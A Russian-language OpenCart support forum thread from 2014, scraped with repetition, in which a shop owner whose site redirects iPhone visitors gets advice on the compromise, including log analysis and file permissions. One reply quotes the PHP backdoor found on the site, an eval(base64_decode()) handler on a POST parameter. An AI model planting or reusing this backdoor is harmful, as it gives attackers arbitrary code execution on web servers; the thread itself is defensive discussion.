dexion Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Доброй ночи всем. Возникла следующая ситуация: при заходе на мой сайт ** с iPhone возникает необычная проблема (скрины во вложении). Действительно ли это вирус? Как с ним бороться? *решено Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Вредоносное ПО установлено у вас на сервере. В этом нет никаких сомнений. с вашего сайта происходит редирект на сайт злоумышленников. Как бороться? В двух словах этого не описать. И тем более не зная всей картины. Попробуйте обратиться с этой проблемой в "платные услуги". Но только нужно понимать, что даже если вычистить всю нечисть, которая сейчас есть на сайте, то она может появиться снова если есть, например, на вашем хостинг-аккаунте сайты на вордпресс или джумле. также возможна брешь у хостера и куча других банальностей (наличие паролей доступа у третьих лиц, кража ftp-паролей с вашего компьютера вирусом). Это я пишу к тому, что нельзя гарантировать 100% безопасность сайта в дальнейшем даже после успешной зачистки сервера. Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Удалось решить проблему простым удалением вредоносного кода из .htaccess. Возможно это только временное решение, посмотрим. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Удалось решить проблему простым удалением вредоносного кода из .htaccess. Возможно это только временное решение, посмотрим. поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). Надіслати Поділитися на інших сайтах More sharing options... ravilr Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) Надіслати Поділитися на інших сайтах More sharing options... snastik Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) нет, шаблон дефолтный поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). да, согласен. а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? или наводку кинете. а то в интернете как то не особо много информации про поиск и лечение вирусов на опенкарте Посмотрите в папку downloads, там тоже будет много вкусного! спасибо, глянем Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! в папке download лежат 4 файла http://prntscr.com/2uhwdp : 1) пустой index.php 2) и 3) для маркета 4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr можно ли считать 4й вариант причиной этой проблемы? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Вредоносное ПО установлено у вас на сервере. В этом нет никаких сомнений. с вашего сайта происходит редирект на сайт злоумышленников. Как бороться? В двух словах этого не описать. И тем более не зная всей картины. Попробуйте обратиться с этой проблемой в "платные услуги". Но только нужно понимать, что даже если вычистить всю нечисть, которая сейчас есть на сайте, то она может появиться снова если есть, например, на вашем хостинг-аккаунте сайты на вордпресс или джумле. также возможна брешь у хостера и куча других банальностей (наличие паролей доступа у третьих лиц, кража ftp-паролей с вашего компьютера вирусом). Это я пишу к тому, что нельзя гарантировать 100% безопасность сайта в дальнейшем даже после успешной зачистки сервера. Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Удалось решить проблему простым удалением вредоносного кода из .htaccess. Возможно это только временное решение, посмотрим. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Удалось решить проблему простым удалением вредоносного кода из .htaccess. Возможно это только временное решение, посмотрим. поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). Надіслати Поділитися на інших сайтах More sharing options... ravilr Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) Надіслати Поділитися на інших сайтах More sharing options... snastik Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) нет, шаблон дефолтный поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). да, согласен. а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? или наводку кинете. а то в интернете как то не особо много информации про поиск и лечение вирусов на опенкарте Посмотрите в папку downloads, там тоже будет много вкусного! спасибо, глянем Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! в папке download лежат 4 файла http://prntscr.com/2uhwdp : 1) пустой index.php 2) и 3) для маркета 4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr можно ли считать 4й вариант причиной этой проблемы? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 джино Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам. Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах. Назначают всем папкам права 777, например (так ведь быстрее движок установить!). Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема. у меня не на всех папках права 777))) только на 2-х Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у меня не на всех папках права 777))) только на 2-х у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 у вас - да. а у топикстартера, например, все 777, что весьма нехорошо. В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются). Через них ломают в первую очередь. А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера. хостинги у вас разные. http://bestsantehnika.com/ Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 2c4and, движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore. как вариант, дело в модулях, полученных из ненадежных источников. но не обязательно. Если скинете коды доступа в личку, то могу внимательнее посмотреть. Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Похоже на сайт попал вирус Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Удалось решить проблему простым удалением вредоносного кода из .htaccess. Возможно это только временное решение, посмотрим. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Удалось решить проблему простым удалением вредоносного кода из .htaccess. Возможно это только временное решение, посмотрим. поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). Надіслати Поділитися на інших сайтах More sharing options... ravilr Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) Надіслати Поділитися на інших сайтах More sharing options... snastik Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 шаблон купленый? ;) нет, шаблон дефолтный поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины. код ведь не их воздуха возник сам по себе. его туда внедрили. когда перекроете дыру, только тогда можете говорить о решении проблемы. У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД). да, согласен. а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? или наводку кинете. а то в интернете как то не особо много информации про поиск и лечение вирусов на опенкарте Посмотрите в папку downloads, там тоже будет много вкусного! спасибо, глянем Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Посмотрите в папку downloads, там тоже будет много вкусного! в папке download лежат 4 файла http://prntscr.com/2uhwdp : 1) пустой index.php 2) и 3) для маркета 4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr можно ли считать 4й вариант причиной этой проблемы? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 21 лютого 2014 Автор Share Опубліковано: 21 лютого 2014 Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит положение в поиске найти лечение . :ugeek: Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами. В них может оказаться много полезной информации для опытного человека. это как симптомы болезни для врача. даже установленные права на эти файлы - это уже показатель. у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри. для этого нужны коды доступа (в личку, конечно). Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 21 лютого 2014 Share Опубліковано: 21 лютого 2014 <?php if(isset($_POST['execgate'])) { set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}} } ?> вот это довольно давно уже было на сайте. ворота нараспашку. т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается. но до поры до времени никто не заходил через эти ворота. Надіслати Поділитися на інших сайтах More sharing options... Denys Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 22 лютого 2014 Share Опубліковано: 22 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? Потому что очень уж спокойно вам залили shell в папку download Какие модули стоят и какие vqmod допилы? Надіслати Поділитися на інших сайтах More sharing options... markimax Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код. встречались ли вы с таким подходом? Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п. Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль. Надіслати Поділитися на інших сайтах More sharing options... sitecreator Опубліковано: 23 лютого 2014 Share Опубліковано: 23 лютого 2014 А какая версия opencart у вас? для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013. Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера Надіслати Поділитися на інших сайтах More sharing options... dexion Опубліковано: 24 лютого 2014 Автор Share Опубліковано: 24 лютого 2014 Такая же фигня переадресация с данным плеером на сайт люксут причем на всех сайтах на аккаунте хостера а какой у вас хостинг? Надіслати Поділитися на інших сайтах More sharing options... 2c4and Опубліковано: 24 лютого 2014 Share 